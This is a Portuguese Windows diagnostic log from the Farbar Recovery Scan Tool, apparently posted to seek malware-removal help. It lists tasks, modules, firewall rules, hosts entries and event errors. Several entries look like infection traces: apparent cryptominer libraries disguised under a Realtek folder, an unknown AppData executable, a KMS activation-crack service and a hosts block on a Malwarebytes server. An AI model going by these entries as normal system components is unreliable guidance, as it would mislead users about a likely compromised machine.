Task: {F56B5354-CBEB-4CB7-8501-6C949C19FF18} - System32\Tasks\Uninstaller_SkipUac_Hercílio => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2017-05-26] (IObit)
Task: {FC9611C2-2800-4682-9E20-5B6F1EE63E69} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-27] (Google Inc.)
Task: {FE2164E5-7A28-4066-A1EC-6CF686DDBF4D} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Nenhum Arquivo <==== ATENÇÃO
 
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
 
Task: C:\WINDOWS\Tasks\RunDFS.job => cmd /c sc start Dell Foundation ServicesWORKGROUP PC NETINHO 07
Task: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Hercílio.job => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe
 
==================== Atalhos & WMI ========================
 
(As entradas podem ser listadas para serem restauradas ou removidas.)
 
 
ShortcutWithArgument: C:\Users\Hercílio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplicativos do Google Chrome\Simple EPUB Reader.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=ojhbgcchcbdjdenibfmjofobklkkhofc
 
==================== Módulos Carregados (Whitelisted) ==============
 
2013-12-24 13:05 - 2013-12-24 13:05 - 000466944 _____ () C:\WINDOWS\system32\DPPPlugin.dll
2017-03-18 17:58 - 2017-03-18 17:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2010-01-09 20:17 - 2010-01-09 20:17 - 004254560 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-01-21 01:40 - 2010-01-21 01:40 - 008794464 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2017-03-18 17:59 - 2017-03-20 01:02 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 000014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 000739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 000014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 000071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 000011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 002013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 000191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2016-12-30 20:03 - 2016-10-31 00:09 - 000670208 _____ () C:\Users\Hercílio\AppData\Roaming\Realtek\Realtek\audiobg.exe
2016-12-30 20:03 - 2016-10-26 21:13 - 000045056 _____ () C:\Users\Hercílio\AppData\Roaming\Realtek\Realtek\cpu_tromp_SSE2.dll
2016-12-30 20:03 - 2016-10-26 21:13 - 000247808 _____ () C:\Users\Hercílio\AppData\Roaming\Realtek\Realtek\logsetuplib.dll
2016-12-30 20:03 - 2016-10-26 21:13 - 006170624 _____ () C:\Users\Hercílio\AppData\Roaming\Realtek\Realtek\cuda_tromp.dll
2017-06-27 15:10 - 2017-06-23 00:21 - 003807064 _____ () C:\Program Files (x86)\Google\Chrome\Application\59.0.3071.115\libglesv2.dll
2017-06-27 15:10 - 2017-06-23 00:21 - 000100184 _____ () C:\Program Files (x86)\Google\Chrome\Application\59.0.3071.115\libegl.dll
2017-07-14 18:54 - 2017-03-28 17:08 - 000210720 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madBasic_.bpl
2017-07-14 18:54 - 2017-03-28 17:08 - 000059680 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madDisAsm_.bpl
2017-07-14 18:54 - 2017-03-28 17:08 - 000442144 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madExcept_.bpl
2017-07-14 18:47 - 2016-08-18 18:43 - 000442144 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\madExcept_.bpl
2017-07-14 18:47 - 2016-08-18 18:43 - 000210720 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\madBasic_.bpl
2017-07-14 18:47 - 2016-08-18 18:43 - 000059680 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\madDisAsm_.bpl
2017-07-14 18:47 - 2016-11-01 10:11 - 000078624 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\GetProcessDLL.dll
2017-07-14 18:54 - 2017-03-28 17:09 - 000899872 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\webres.dll
2017-07-14 18:54 - 2017-05-10 13:19 - 000631584 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\ProductStatistics.dll
2017-07-14 18:59 - 2016-12-12 16:52 - 000210720 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\madBasic_.bpl
2017-07-14 18:59 - 2016-12-12 16:52 - 000059680 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\madDisAsm_.bpl
2017-07-14 18:59 - 2016-12-12 16:52 - 000442144 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\madExcept_.bpl
2017-07-14 19:00 - 2016-08-10 17:13 - 000899872 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\webres.dll
2017-07-14 19:00 - 2017-05-09 10:59 - 000631584 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\ProductStatistics.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
 
AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10]
 
==================== Modo de Segurança (Whitelisted) ===================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\IMFservice => ""="Service"
 
==================== Associação (Whitelisted) ===============
 
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
 
 
==================== Internet Explorer confiável/restrito ===============
 
(Se uma entrada for incluída na fixlist, será removida do Registro.)
 
IE trusted site: HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br
 
==================== Hosts Conteúdo: ===============================
 
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
 
2013-08-22 10:25 - 2017-04-09 10:47 - 000000855 _____ C:\WINDOWS\system32\Drivers\etc\hosts
 
0.0.0.0 keystone.mwbsys.com
 
==================== Outras Áreas ============================
 
(Atualmente não há nenhuma correção automática para esta seção.)
 
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Hercílio\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\kiba-in-the-snow1.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Firewall do Windows está habilitado.
 
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
 
MSCONFIG\Services: AdaptiveSleepService => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AMD External Events Utility => 2
MSCONFIG\Services: AndServMgr => 2
MSCONFIG\Services: AxInstSV => 3
MSCONFIG\Services: BthHFSrv => 3
MSCONFIG\Services: bthserv => 3
MSCONFIG\Services: c2cautoupdatesvc => 2
MSCONFIG\Services: cphs => 3
MSCONFIG\Services: Dell Customer Connect => 2
MSCONFIG\Services: Dell Foundation Services => 2
MSCONFIG\Services: DellDataVault => 2
MSCONFIG\Services: DellDataVaultWiz => 2
MSCONFIG\Services: DellProdRegManager => 3
MSCONFIG\Services: DellUpdate => 2
MSCONFIG\Services: Disc Soft Ultra Bus Service => 3
MSCONFIG\Services: EpsonScanSvc => 2
MSCONFIG\Services: Fax => 3
MSCONFIG\Services: GalaxyClientService => 3
MSCONFIG\Services: GalaxyCommunication => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: HiPatchService => 2
MSCONFIG\Services: HomeNetSvc => 2
MSCONFIG\Services: IAStorDataMgrSvc => 2
MSCONFIG\Services: ibtsiva => 2
MSCONFIG\Services: ICCS => 3
MSCONFIG\Services: igfxCUIService2.0.0.0 => 2
MSCONFIG\Services: Intel® Capability Licensing Service TCP IP Interface => 3
MSCONFIG\Services: Intel® ME Service => 2
MSCONFIG\Services: IntelUSBoverIP => 2
MSCONFIG\Services: iumsvc => 3
MSCONFIG\Services: jhi_service => 2
MSCONFIG\Services: LMS => 2
MSCONFIG\Services: MBAMScheduler => 2
MSCONFIG\Services: MBAMService => 3
MSCONFIG\Services: McAfee SiteAdvisor Service => 2
MSCONFIG\Services: McAWFwk => 3
MSCONFIG\Services: McComponentHostService => 3
MSCONFIG\Services: mccspsvc => 2
MSCONFIG\Services: McNaiAnn => 2
MSCONFIG\Services: mcpltsvc => 2
MSCONFIG\Services: RtkAudioService => 2
MSCONFIG\Services: SftService => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: SupportAssistAgent => 2
MSCONFIG\Services: SynTPEnhService => 2
MSCONFIG\Services: TrueColorALS => 2
MSCONFIG\Services: updater => 3
MSCONFIG\Services: XblAuthManager => 3
MSCONFIG\Services: XblGameSave => 3
MSCONFIG\Services: XboxNetApiSvc => 3
HKLM\...\StartupApproved\StartupFolder: => "McAfee Security Scan Plus.lnk"
HKLM\...\StartupApproved\Run: => "TrueColor UI"
HKLM\...\StartupApproved\Run: => "Diebold - Warsaw"
HKLM\...\StartupApproved\Run32: => "DropboxOEM"
HKLM\...\StartupApproved\Run32: => "Redirector"
HKLM\...\StartupApproved\Run32: => "ConnectionCenter"
HKLM\...\StartupApproved\Run32: => "Discord"
HKLM\...\StartupApproved\Run32: => "BCSSync"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\StartupFolder: => "Curse.lnk"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "uTorrent"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "DAEMON Tools Pro Agent"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "EPLTarget\P0000000000000000"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "EPLTarget\P0000000000000001"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "DAEMON Tools Ultra Agent"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "Free Download Manager"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "psexe"
 
==================== Regras do Firewall (Whitelisted) ===============
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
FirewallRules: [{42C94204-6E8B-42D4-871A-50EFA70236DF}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [UDP Query User{9ADE523F-B7FD-4FCE-8DA0-F15FCD38AF77}C:\users\hercílio\appdata\local\programs\lnv\stremio\stremio.exe] => (Allow) C:\users\hercílio\appdata\local\programs\lnv\stremio\stremio.exe
FirewallRules: [TCP Query User{EE5F9A71-0A44-40DF-843B-5CC5BED31BAE}C:\users\hercílio\appdata\local\programs\lnv\stremio\stremio.exe] => (Allow) C:\users\hercílio\appdata\local\programs\lnv\stremio\stremio.exe
FirewallRules: [UDP Query User{AAEAE760-817F-4CEF-94A4-02E9196DDF96}C:\program files (x86)\electronic arts\kingdoms of amalur - reckoning\reckoning.exe] => (Allow) C:\program files (x86)\electronic arts\kingdoms of amalur - reckoning\reckoning.exe
FirewallRules: [TCP Query User{AE7D017E-D404-485F-85D7-2A8268475720}C:\program files (x86)\electronic arts\kingdoms of amalur - reckoning\reckoning.exe] => (Allow) C:\program files (x86)\electronic arts\kingdoms of amalur - reckoning\reckoning.exe
FirewallRules: [{746A19D0-781E-46BB-BFF6-6B653018303C}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{B3FA0D7D-C911-453B-A8A7-40623A8B6815}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [UDP Query User{9E684EDD-D9B4-4E5F-92C0-0675A2B63C45}C:\users\hercã­lio\desktop\jogos\starcraft ii\support64\sc2editor_x64.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\starcraft ii\support64\sc2editor_x64.exe
FirewallRules: [TCP Query User{3DE6FED7-53C4-4560-9FA8-9A54C8409F46}C:\users\hercã­lio\desktop\jogos\starcraft ii\support64\sc2editor_x64.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\starcraft ii\support64\sc2editor_x64.exe
FirewallRules: [UDP Query User{352AF235-CDF7-4CF3-A26B-1457BDAEF8EC}C:\users\hercã­lio\desktop\jogos\diablo iii\diablo iii.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\diablo iii\diablo iii.exe
FirewallRules: [TCP Query User{C9585E03-5CE2-4904-BF63-EE9D161B6E9B}C:\users\hercã­lio\desktop\jogos\diablo iii\diablo iii.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\diablo iii\diablo iii.exe
FirewallRules: [{01076931-7639-423C-9372-578B87C69463}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{6CEC797E-29E9-4F05-B966-BC6A617151F0}] => (Allow) C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe
FirewallRules: [{D097BFC7-BA20-4E34-9BCC-ADB363AD3174}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{0FCF790E-4216-4840-AAB9-3E767670C863}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{EEA120A9-E296-4E24-828A-EAF245D1D829}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{370BE90D-7684-471A-AF01-A21A2568B452}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{4F7EDFCC-AB86-4095-AA4F-3A849FA96B74}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{6B2311F3-0BA7-4F7C-9911-01331C41BFF4}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [TCP Query User{D6A44EE5-5286-4FE5-8C2C-EAE3E2BCF79A}C:\program files (x86)\xcom 2\binaries\win64\xcom2.exe] => (Allow) C:\program files (x86)\xcom 2\binaries\win64\xcom2.exe
FirewallRules: [UDP Query User{6783B4E1-0B4B-4373-90A0-4615FF9F4EA3}C:\program files (x86)\xcom 2\binaries\win64\xcom2.exe] => (Allow) C:\program files (x86)\xcom 2\binaries\win64\xcom2.exe
FirewallRules: [TCP Query User{2117988C-C193-4482-B0A8-B91876BBEE23}C:\users\hercílio\desktop\jogos\hearthstone\hearthstone.exe] => (Allow) C:\users\hercílio\desktop\jogos\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{ACEA0377-0833-4605-B558-C3938CFCF1A3}C:\users\hercílio\desktop\jogos\hearthstone\hearthstone.exe] => (Allow) C:\users\hercílio\desktop\jogos\hearthstone\hearthstone.exe
FirewallRules: [TCP Query User{DF8BF4F9-749D-4D6D-8F61-5BB7F6015473}C:\users\hercã­lio\desktop\jogos\diablo iii\x64\diablo iii64.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\diablo iii\x64\diablo iii64.exe
FirewallRules: [UDP Query User{EE866013-63B8-4DD7-878E-4A0F30EE08D2}C:\users\hercã­lio\desktop\jogos\diablo iii\x64\diablo iii64.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\diablo iii\x64\diablo iii64.exe
FirewallRules: [TCP Query User{CF850361-EB6B-45F7-88BD-BFD4081FCDC1}C:\users\hercã­lio\desktop\jogos\heroes of the storm\versions\base53548\heroesofthestorm_x64.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\heroes of the storm\versions\base53548\heroesofthestorm_x64.exe
FirewallRules: [UDP Query User{36F10EB6-2D78-4BF3-ACEF-A8F4013FB97D}C:\users\hercã­lio\desktop\jogos\heroes of the storm\versions\base53548\heroesofthestorm_x64.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\heroes of the storm\versions\base53548\heroesofthestorm_x64.exe
FirewallRules: [{764862B4-C5FD-4109-8C42-153531FAB18D}] => (Allow) C:\Program Files (x86)\Mass Effect Andromeda\MassEffectAndromedaTrial.exe
FirewallRules: [{A50F65C6-E9F2-46AE-89D4-ED809A6FD844}] => (Allow) C:\Program Files (x86)\Mass Effect Andromeda\MassEffectAndromedaTrial.exe
FirewallRules: [{BE0F5558-4953-4A2C-A426-E6CC0B3EAAA6}] => (Allow) C:\Program Files (x86)\Mass Effect Andromeda\MassEffectAndromeda.exe
FirewallRules: [{28A091D8-C70E-43E8-845D-21E0EC4063DF}] => (Allow) C:\Program Files (x86)\Mass Effect Andromeda\MassEffectAndromeda.exe
FirewallRules: [TCP Query User{B9500348-932C-4FCE-A35E-05E0AE65F1B5}C:\program files (x86)\steam\steamapps\common\cryptic studios\neverwinter\live\gameclient.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cryptic studios\neverwinter\live\gameclient.exe
FirewallRules: [UDP Query User{BB4ECDFF-596F-43B4-82D1-AF0CDFFDD43B}C:\program files (x86)\steam\steamapps\common\cryptic studios\neverwinter\live\gameclient.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cryptic studios\neverwinter\live\gameclient.exe
FirewallRules: [{25D9A896-AE02-4586-9FA4-E8166209FBDD}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{4EC63264-9850-411C-9B47-9D3C2231538D}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{B435C236-7889-4D0C-BA74-40FB502455B8}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{CC47023E-44E3-4A30-B0E5-3AFD3467E2E5}C:\program files\windowsapps\xbmcfoundation.kodi_17.3.0.0_x86__4n2hpmxwrvr6p\kodi.exe] => (Allow) C:\program files\windowsapps\xbmcfoundation.kodi_17.3.0.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [UDP Query User{396952E8-7C04-47F5-B02C-8C0C1935D2DF}C:\program files\windowsapps\xbmcfoundation.kodi_17.3.0.0_x86__4n2hpmxwrvr6p\kodi.exe] => (Allow) C:\program files\windowsapps\xbmcfoundation.kodi_17.3.0.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [{EA0EA414-2B25-4543-85EB-4A5787CAD5AC}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
FirewallRules: [{7B4C3DA7-E5D6-48D9-9562-2DD1C4A051ED}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
FirewallRules: [{F774E765-068C-4179-9C0F-B7D727DC6D26}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DBDownloader.exe
FirewallRules: [{90CE76BB-E96F-4488-AC68-4BE5975D8A69}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DBDownloader.exe
FirewallRules: [{592133A0-C19D-41FE-94DA-4EF2A7B0A8E5}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\AutoUpdate.exe
FirewallRules: [{8F6B0654-083F-43AD-A010-B83525AB3287}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\AutoUpdate.exe
FirewallRules: [{8ED6BACD-AC1E-4340-990A-367CF99872CC}] => (Block) LPort=445
FirewallRules: [{8592147B-B201-4FED-B6B9-C5864BDF7202}] => (Block) LPort=445
FirewallRules: [{54F82A2A-DB25-466E-8663-FE145DC48A47}] => (Allow) C:\Program Files (x86)\IObit\Advanced SystemCare\Surfing Protection\FFNativeMessage.exe
FirewallRules: [{F000EE94-3781-4402-BB3F-DE5085B0578C}] => (Allow) C:\Program Files (x86)\IObit\Advanced SystemCare\Surfing Protection\FFNativeMessage.exe
FirewallRules: [{1312B064-A57D-4132-8E7C-A1F0CB771CD6}] => (Allow) C:\Program Files (x86)\IObit\IObit Malware Fighter\Surfing Protection\FFNativeMessage.exe
FirewallRules: [{2F77B83C-4045-4EF1-B934-05FB8ACFBC5C}] => (Allow) C:\Program Files (x86)\IObit\IObit Malware Fighter\Surfing Protection\FFNativeMessage.exe
FirewallRules: [TCP Query User{48977D39-4CAC-4FDC-8FB4-E85D652C8548}C:\program files (x86)\might and magic heroes vii\binaries\win64\mmh7game-win64-shipping.exe] => (Allow) C:\program files (x86)\might and magic heroes vii\binaries\win64\mmh7game-win64-shipping.exe
FirewallRules: [UDP Query User{94C32F5C-EA37-4EFD-915A-B25540CA8A06}C:\program files (x86)\might and magic heroes vii\binaries\win64\mmh7game-win64-shipping.exe] => (Allow) C:\program files (x86)\might and magic heroes vii\binaries\win64\mmh7game-win64-shipping.exe
FirewallRules: [TCP Query User{E10F0748-E7DA-4EC7-9575-50B90FBFF772}C:\program files\windowsapps\xbmcfoundation.kodi_17.3.6.0_x86__4n2hpmxwrvr6p\kodi.exe] => (Allow) C:\program files\windowsapps\xbmcfoundation.kodi_17.3.6.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [UDP Query User{0C6D8CDD-E65C-407F-815E-C753981A83C9}C:\program files\windowsapps\xbmcfoundation.kodi_17.3.6.0_x86__4n2hpmxwrvr6p\kodi.exe] => (Allow) C:\program files\windowsapps\xbmcfoundation.kodi_17.3.6.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [{8B93DB4A-774D-4CB7-855E-FB06027E716E}] => (Allow) C:\Program Files (x86)\Nox\bin\Nox.exe
FirewallRules: [{7A28CB55-E271-4B80-B962-53337748A454}] => (Allow) C:\Program Files (x86)\Bignox\BigNoxVM\RT\NoxVMHandle.exe
FirewallRules: [TCP Query User{F4466481-470A-4BB5-A047-4B8DC0E9258C}C:\windows\syswow64\explorer.exe] => (Block) C:\windows\syswow64\explorer.exe
FirewallRules: [UDP Query User{56543320-A1A1-4212-B023-A8326A8D6496}C:\windows\syswow64\explorer.exe] => (Block) C:\windows\syswow64\explorer.exe
 
==================== Pontos de Restauração =========================
 
17-07-2017 02:18:39 Ponto de Verificação Agendado
25-07-2017 22:41:07 Ponto de Verificação Agendado
31-07-2017 14:46:33 Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030
 
==================== Dispositivos Apresentando Falhas No Gerenciador =============
 
 
==================== Erros no Log de eventos: =========================
 
Erros em Aplicativos:
==================
Error: (08/03/2017 01:08:59 PM) (Source: ESENT) (EventID: 455) (User: )
Description: SettingSyncHost (6096) {C10566E9-A1A3-4A46-8199-43185D4F84AC}: Erro -1811 (0xfffff8ed) ao abrir o arquivo de log C:\Users\Hercílio\AppData\Local\Microsoft\Windows\SettingSync\remotemetastore\v1\edb0004F.log.
 
Error: (08/03/2017 01:03:32 PM) (Source: ESENT) (EventID: 455) (User: )
Description: taskhostw (2576) WebCacheLocal: Erro -1811 (0xfffff8ed) ao abrir o arquivo de log C:\Users\Hercílio\AppData\Local\Microsoft\Windows\WebCache\V010002D.log.
 
Error: (08/03/2017 01:03:12 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 257) (User: )
Description: Falha dos Serviços de Criptografia ao inicializar o Catálogo do Banco de Dados. Erro do ESENT:-528.
 
Error: (08/03/2017 01:03:12 PM) (Source: ESENT) (EventID: 455) (User: )
Description: Catalog Database (2372) Catalog Database: Erro -1811 (0xfffff8ed) ao abrir o arquivo de log C:\WINDOWS\system32\CatRoot2\edb00006.log.
 
Error: (08/03/2017 11:08:19 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: Falha no Procedimento Open para o serviço "BITS" na DLL "C:\Windows\System32\bitsperf.dll". Os dados de desempenho para este serviço não estarão disponíveis. Os primeiros quatro bytes (DWORD) da seção de Dados contêm o código do erro.
 
Error: (08/03/2017 11:08:12 AM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação do Comprovante da Compra. 0xC004E016
Pkey Parcial=3YGVK
ACID=?
Erro Detalhado[?]
 
Error: (08/03/2017 10:58:17 AM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação do Comprovante da Compra. 0xC004E016
Pkey Parcial=3YGVK
ACID=?
Erro Detalhado[?]
 
Error: (08/03/2017 10:58:05 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: ZeroConfigService.exe, versão: 19.10.0.0, carimbo de data/hora: 0x57a32942
Nome do módulo com falha: ntdll.dll, versão: 10.0.15063.447, carimbo de data/hora: 0xa329d3a8
Código de exceção: 0xc0000374
Deslocamento da falha: 0x00000000000f775f
ID do processo com falha: 0xc38
Hora de início do aplicativo com falha: 0x01d30c60708689db
Caminho do aplicativo com falha: C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
Caminho do módulo com falha: C:\WINDOWS\SYSTEM32\ntdll.dll
ID do Relatório: 710b8628-38ea-49fc-9327-617343e1fb81
Nome completo do pacote com falha: 
ID do aplicativo relativo ao pacote com falha:
 
Error: (08/03/2017 10:21:24 AM) (Source: Google Update) (EventID: 1) (User: AUTORIDADE NT)
Description: Event-ID 1
 
Error: (08/03/2017 10:20:17 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: pxese.exe, versão: 1.0.0.1, carimbo de data/hora: 0x5981dd4a
Nome do módulo com falha: unknown, versão: 0.0.0.0, carimbo de data/hora: 0x00000000
Código de exceção: 0xc0000005
Deslocamento da falha: 0x50d1c1ed
ID do processo com falha: 0x4964
Hora de início do aplicativo com falha: 0x01d30c597b16332e
Caminho do aplicativo com falha: C:\Users\Hercílio\AppData\Roaming\pxese.exe
Caminho do módulo com falha: unknown
ID do Relatório: f58fbbe6-7718-4fcb-8e11-1997eae9c6cc
Nome completo do pacote com falha: 
ID do aplicativo relativo ao pacote com falha:
 
 
Erros de Sistema:
=============
Error: (08/03/2017 02:17:47 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 e APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
 
Error: (08/03/2017 01:06:38 PM) (Source: DCOM) (EventID: 10010) (User: AUTORIDADE NT)
Description: O servidor {784E29F4-5EBE-4279-9948-1E8FE941646D} não se registrou no DCOM dentro do tempo limite necessário.
 
Error: (08/03/2017 01:03:30 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: O serviço Serviço de Usuário da Plataforma de Dispositivos Conectados_4a0dd terminou com o erro: 
Erro não especificado
 
Error: (08/03/2017 01:02:35 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a conexão do serviço WsAppService.
 
Error: (08/03/2017 01:02:33 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Ds3Service devido ao seguinte erro: 
O serviço não respondeu à requisição de início ou controle em tempo hábil.
 
Error: (08/03/2017 01:02:33 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a conexão do serviço Ds3Service.
 
Error: (08/03/2017 01:01:56 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço CldFlt devido ao seguinte erro: 
Não há suporte para o pedido.
 
Error: (08/03/2017 01:01:46 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: O desligamento do sistema que ocorreu às 12:57:09 do dia ‎03/‎08/‎2017 não era esperado.
 
Error: (08/03/2017 11:13:28 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço Service KMSELDI foi encerrado inesperadamente.  Isso aconteceu 1 vez(es).
 
